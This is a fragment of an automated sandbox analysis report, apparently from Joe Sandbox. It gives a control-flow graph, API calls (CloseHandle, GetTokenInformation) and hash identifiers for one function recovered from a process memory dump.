                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 591 22583e7-22583e9 592 22582c5-22582c8 591->592 593 22583ef 591->593 595 22582ce 592->595 596 22583f9 592->596 593->592 594 22583f5-22583f7 593->594 594->596 599 22582d0 595->599 600 225828f-2258303 call 22872ec 595->600 597 22582d2-22582d7 596->597 598 22583ff 596->598 601 2258306-2258309 597->601 603 225f524-225f52e 598->603 599->597 599->600 600->601 617 225834f-2258355 600->617 604 225832e-2258330 601->604 605 225830b-2258311 CloseHandle 601->605 606 225f807 603->606 611 2258332 604->611 612 22582dd-22582e3 604->612 605->604 609 225f80d 606->609 610 225f8df-225f8e0 606->610 609->610 614 225f813 609->614 619 22615a5-22615aa 610->619 611->612 613 2258334 611->613 615 22583a3-22583a4 612->615 616 22582e9 612->616 613->603 624 225f78f 614->624 625 225f81b 614->625 615->603 616->615 621 22582ef 616->621 622 2258341 617->622 623 2258212-225821a GetTokenInformation 617->623 626 22615ae-22615af 619->626 632 22582f0-225831c 621->632 622->623 627 2258347 622->627 629 2258220-2258234 623->629 630 22583af 623->630 624->625 628 225f795 624->628 625->610 631 22615b2-22615b7 626->631 633 225834d 627->633 634 2261638-2261640 627->634 628->606 660 22583d7-22583dd 629->660 661 225823a 629->661 636 22583b5 630->636 637 2258251-2258256 call 22872f4 630->637 638 22615ba-22615c1 631->638 656 22581e5 632->656 657 2258322 632->657 633->617 640 2261646-226165f 634->640 641 226170e-2261727 634->641 636->637 642 22583bb-22583ca 636->642 654 225825b-2258260 637->654 643 22615c7-22615d2 638->643 644 2261750-22617a2 call 22872f4 638->644 640->643 648 2261665 640->648 641->643 647 226172d 641->647 682 2258277-225827a 642->682 683 22583d0 642->683 652 22615d4-22615d6 643->652 653 2261620-2261623 643->653 647->644 648->644 663 2261670-2261684 652->663 664 22615dc-22615df 652->664 658 2261625-2261628 653->658 659 22616a0-22616b4 653->659 655 2258390-2258393 654->655 666 225827e 655->666 667 2258399 655->667 673 22582a3-22582a5 656->673 674 22581eb 656->674 657->656 669 2258328-225832c 657->669 658->638 665 226162a-2261636 658->665 670 22616b6-22616b9 659->670 671 22616f4-22616f5 659->671 660->596 661->660 672 2258240 661->672 663->619 668 226168a-226168d 663->668 664->638 676 22615e1-22615f6 664->676 665->634 686 22616dc-22616ec 665->686 666->605 680 2258284 666->680 667->666 679 225839f-22583a1 667->679 687 2261693-2261697 668->687 688 226172f-2261738 668->688 669->592 669->604 689 226173a-226173b 670->689 690 22616bb 670->690 695 22616fe-226170c 671->695 681 226b32e-226b330 672->681 673->596 678 22582ab 673->678 691 22581f1 674->691 692 22582b2-22582bc 674->692 684 22616d2-22616d7 676->684 685 22615fc-2261600 676->685 678->596 696 22582b1 678->696 679->615 680->604 703 226b332-226b337 call 22872f4 681->703 704 226b300 681->704 699 2258241 682->699 700 225827c 682->700 683->682 701 22583d6 683->701 684->626 685->695 702 2261606-2261618 685->702 686->643 694 22616f2 686->694 705 22616bf-22616cd 687->705 697 226173f-2261740 688->697 689->697 690->705 691->692 693 22581f7-225828e 691->693 692->592 698 2258357-225836f GetTokenInformation 692->698 694->644 707 2261744-2261748 695->707 696->692 697->707 710 2258376-225837b 698->710 699->637 699->710 700->666 700->699 702->631 703->704 717 226b339 703->717 711 226b302 704->711 712 226b2fd 704->712 710->632 714 2258381 710->714 715 226b305 712->715 716 226b2ff 712->716 714->632 718 2258387 714->718 719 226b308-226b315 715->719 720 226b322-226b32d 715->720 716->719 717->704 721 226b33b-226b33f 717->721 718->655 718->682 719->715 723 226b317 719->723 720->681 721->719 723->712
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1751292247.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_2250000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: bf0d9f4d2c0ffdbdc90a198ed00c85e92492ab530fbb616ee8987225826f67bd
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62F0623553DAF3AB863586C48544A362F50AB42214BACC049CC46CB92ED3F8DCC2C753